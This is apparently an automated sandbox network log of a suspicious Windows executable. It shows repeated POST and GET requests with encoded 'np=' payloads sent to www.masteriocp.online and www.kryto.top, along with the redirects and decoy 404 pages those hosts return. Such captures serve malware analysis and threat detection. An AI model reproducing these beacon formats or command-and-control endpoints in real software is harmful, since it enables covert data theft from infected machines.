              Session ID: 9 | Source IP: 192.168.2.6 | Source Port: 57961 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:29.515820980 CEST | Bytes transferred: 785 | Direction: OUT | Data: POST /wg84/ HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.masteriocp.online
              Referer: http://www.masteriocp.online/wg84/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Ascii: np=8AsyGU9UOuOI8mfM0SG1k3tk2J6v/pakLVPphUWSLKw0s5KOLxdrdy6yfBx0CeBO3nFPd3HiM5ndjfX7PlAnHNh9LN94F4g0AVv3PZ8xzXfvItRd7Fxpl5lTrupJqNfakP9T5oQ9xmbuPmPVnfLPrh/az1OEFBmuME38LGh3bAl/T37vCPN2fC3KPDUztTnuVvOD6CSHUjES
              Timestamp: Sep 18, 2024 09:03:30.443711996 CEST | Bytes transferred: 368 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:30 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session ID: 10 | Source IP: 192.168.2.6 | Source Port: 57962 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:32.074074030 CEST | Bytes transferred: 809 | Direction: OUT | Data: POST /wg84/ HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.masteriocp.online
              Referer: http://www.masteriocp.online/wg84/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Ascii: np=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8Y0sbCOKwdray6yQhxtduBZ3nJpd27iM5Ddjfn7IWomGdh7f992IYg0AVv3PZpqzTzvIchd5kxovZlU8epJ79fekP885qkTxjfuPjzVnuLO4B/culPYMxCiVUKYV0FsMgYfSB61e8NVNSXIPBMBtznEXv2DoVegbXhxPoHRce7ZU40iosCM8KPUSA==
              Timestamp: Sep 18, 2024 09:03:33.004784107 CEST | Bytes transferred: 368 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:32 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 57963 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:34.625386953 CEST | Bytes transferred: 1822 | Direction: OUT | Data: POST /wg84/ HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.masteriocp.online
              Referer: http://www.masteriocp.online/wg84/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Ascii: np=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8g0tuWOLT1rby6yZBxoduAb3nRtd22XM7LdyMf7JnomJdh7At97F4hpAV/zPZ5qzTzvIe5dwVxopZlTrupFqNf2kP1L5pItxXruPDDVl8TOiB/etlPQMx/8VXu6VwNWMnwffV7hZe8PcRjCeRM+hUfOT+yds2y/eElRMcHtZ+uSaI4vlanL6rihK1PFnMGLooCb5dt5hNGlPOg9pPNm2GaYoNgSFXRzLzJKQasbUPrfoCfyU515axUlW9rGDP3wyMc7M9/u0qlJcHL1uaIBpiJnKNMbync4/SRlOF0nBzJ+pm5rSbd45XxQ264B+1aHsWKbe1QYfajh39Kmk2pyftqdG472JukdHEyXuShCnpuSwKPtnx7yIZYLrr5VeEiMIyBXWFv4IwD5hFOytYY49IqKbMR9Qwuv6amLZbXUOq8+agbl0nEqwkmkAWFZRXCeyXTYVOwTp++F9ldJn4Oy86zs8B18mFDfkyOaQQMgoPqX4Uvmx5Z2vHoh/TRVU+OmCBZDb3/2bbw9ta9zZIobk9b9W9zasHUFNXM5nLC6exAD4vdZ8U7g2DE4vSDNCDda5oEm3B6mV3IFa0Vr8336eLZYAlVxyejs2ciYHd9MvkJhNB8iLCPP/BK9bZX6lKOrc+phQk1ajtYSQcwF/ijUucwb4iP5NptYomeKhQ5IkXXUQXHCvamzMGY944BTsCnlDe4e3I58G0INUfxnPTaZp4jbdETcj8CjSeLGl1MyrhS0iOtFPZSf3s4Q2OF/0Rmt+04IZySZOQaaI8IwkjrNogN0c4wwMKKtU54p8Fhi2049MQX+5ak4qqPwumuQw6LcW7tp/AuHe0flIOkFmfuO1sdsMnSavPYL7M2Ar+EO33vXmCNGCE71f8sZZVQ2nddjUog2IswuXKZVZUihlwhaawfHo3vlih8fKE5mlSp+FuNQg7JcYMoUQvi4gvNHLedBp+Pv+ou2z [TRUNCATED]
              Timestamp: Sep 18, 2024 09:03:35.518085003 CEST | Bytes transferred: 368 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:35 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 57964 | Destination IP: 13.228.81.39 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:37.164659977 CEST | Bytes transferred: 514 | Direction: OUT | Data: GET /wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM HTTP/1.1
              Host: www.masteriocp.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Language: en-US,en;q=0.5
              Connection: close
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Timestamp: Sep 18, 2024 09:03:38.097789049 CEST | Bytes transferred: 519 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
              Server: openresty
              Date: Wed, 18 Sep 2024 07:03:37 GMT
              Content-Type: text/html
              Content-Length: 166
              Connection: close
              Location: https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


              Session ID: 13 | Source IP: 192.168.2.6 | Source Port: 57965 | Destination IP: 162.0.213.94 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:43.712222099 CEST | Bytes transferred: 761 | Direction: OUT | Data: POST /09dt/ HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 207
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.kryto.top
              Referer: http://www.kryto.top/09dt/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Ascii: np=mZ3m6Qa3ZY/2FSWLRPpCBVrJ6whn85CzVgIjcQmA6AIBpLAzBd08yUnVXgXsA0YF0tdtzulnSLi3KyU85GZGTZcfyZUPqA4LCCKowp43ujzJ+bxmy1OCW/7I4mSWW6aMICG7mo9ODEDok2H8LFo2bT7oVC1Xi1GXapdTsgBtPWZ8ACofb3Q/VYDdRixVY4TKvx7fGB35oSTP
              Timestamp: Sep 18, 2024 09:03:44.286305904 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:44 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


              Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 57966 | Destination IP: 162.0.213.94 | Destination Port: 80 | PID: 3196 | Process: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp: Sep 18, 2024 09:03:46.270148993 CEST | Bytes transferred: 785 | Direction: OUT | Data: POST /09dt/ HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.kryto.top
              Referer: http://www.kryto.top/09dt/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 38 42 6e 4a 49 7a 41 63 30 38 31 55 6e 56 64 41 57 6d 64 45 59 53 30 73 68 54 7a 73 78 6e 53 49 65 33 4b 32 51 38 35 78 4e 48 54 4a 63 64 36 35 55 4a 75 41 34 4c 43 43 4b 6f 77 70 39 71 75 69 62 4a 2b 72 42 6d 67 41 36 42 59 66 37 58 73 32 53 57 64 61 61 41 49 43 47 5a 6d 70 68 6b 44 48 72 6f 6b 7a 44 38 50 45 6f 31 51 54 37 79 59 69 31 44 75 58 53 61 66 4c 5a 51 6c 44 74 41 50 6c 52 6f 4d 55 70 46 48 45 51 63 48 49 6a 66 52 67 70 6e 59 59 54 67 74 78 44 66 55 57 37 65 6e 6d 32 73 52 33 62 42 36 72 55 43 45 2b 69 71 52 65 74 54 50 64 50 55 42 77 3d 3d
              Data Ascii: np=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6y8BnJIzAc081UnVdAWmdEYS0shTzsxnSIe3K2Q85xNHTJcd65UJuA4LCCKowp9quibJ+rBmgA6BYf7Xs2SWdaaAICGZmphkDHrokzD8PEo1QT7yYi1DuXSafLZQlDtAPlRoMUpFHEQcHIjfRgpnYYTgtxDfUW7enm2sR3bB6rUCE+iqRetTPdPUBw==
              Sep 18, 2024 09:03:46.872869015 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:46 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 18, 2024 09:03:46.872919083 CEST | 1236 | IN | Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
              Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
              Sep 18, 2024 09:03:46.872936010 CEST | 1236 | IN | Data Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d
              Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
              Sep 18, 2024 09:03:46.872950077 CEST | 672 | IN | Data Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
              Sep 18, 2024 09:03:46.872971058 CEST | 1236 | IN | Data Raw: 33 34 33 34 38 39 2c 33 30 2e 32 34 36 37 33 20 39 2e 37 36 30 31 33 32 2c 34 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33
              Data Ascii: 343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <p
              Sep 18, 2024 09:03:46.872987032 CEST | 224 | IN | Data Raw: 36 34 20 2d 31 2e 31 36 36 34 34 2c 31 39 2e 32 34 39 32 31 20 2d 33 2e 33 35 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33
              Data Ascii: 64 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px
              Sep 18, 2024 09:03:46.873029947 CEST | 1236 | IN | Data Raw: 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20
              Data Ascii: ;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16
              Sep 18, 2024 09:03:46.873047113 CEST | 224 | IN | Data Raw: 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37
              Data Ascii: 6.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78
              Sep 18, 2024 09:03:46.873059988 CEST | 1236 | IN | Data Raw: 39 33 34 20 2d 31 2e 32 33 37 33 31 2c 33 34 2e 31 31 35 33 36 20 2d 32 2e 31 38 30 31 34 2c 35 33 2e 36 32 30 31 35 20 2d 30 2e 39 34 32 38 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36
              Data Ascii: 934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
              Sep 18, 2024 09:03:46.873075008 CEST | 224 | IN | Data Raw: 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 34 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31
              Data Ascii: path id="path4549" d="m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922
              Sep 18, 2024 09:03:46.877980947 CEST | 1236 | IN | Data Raw: 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33
              Data Ascii: -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:m


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              15 | 192.168.2.6 | 57967 | 162.0.213.94 | 80 | 3196 | C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 18, 2024 09:03:48.813105106 CEST | 1798 | OUT | POST /09dt/ HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.kryto.top
              Referer: http://www.kryto.top/09dt/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 45 42 6e 38 63 7a 42 37 67 38 30 55 6e 56 65 41 57 6c 64 45 59 50 30 73 35 66 7a 73 39 52 53 4f 53 33 4c 54 45 38 78 67 4e 48 47 35 63 64 32 5a 55 49 71 41 34 65 43 44 36 73 77 70 74 71 75 69 62 4a 2b 6f 5a 6d 77 46 4f 42 61 66 37 49 34 6d 53 53 57 36 61 73 49 43 76 75 6d 70 30 54 41 32 4c 6f 6b 54 7a 38 4a 6d 51 31 4d 44 37 30 62 69 30 45 75 58 50 61 66 4b 30 68 6c 43 5a 71 50 6e 4e 6f 49 6c 41 75 63 47 51 51 52 75 76 56 46 43 74 53 5a 64 7a 65 6c 51 4c 6a 53 6e 48 73 36 6e 43 30 52 79 61 62 7a 62 4e 31 4f 5a 71 56 61 61 63 34 50 4f 69 47 51 42 71 4b 2f 4b 57 77 76 54 6f 6d 63 31 69 65 31 31 52 4c 52 6e 58 43 34 76 38 4c 7a 56 41 4c 31 63 56 6b 41 4f 6d 6d 78 63 68 72 59 56 34 55 73 71 36 6b 2f 52 4c 72 37 49 66 4e 38 35 34 67 44 4e 53 53 4b 71 6b 41 30 64 51 41 39 41 4b 50 4a 48 36 64 2b 59 6f 6a 2b 52 62 52 4a 67 73 77 38 78 30 69 64 5a 6a 43 45 7a 66 4c 56 7a 57 [TRUNCATED]
              Data Ascii: np=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 [TRUNCATED]
              Sep 18, 2024 09:03:49.478764057 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:49 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 18, 2024 09:03:49.478785992 CEST | 1236 | IN | Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
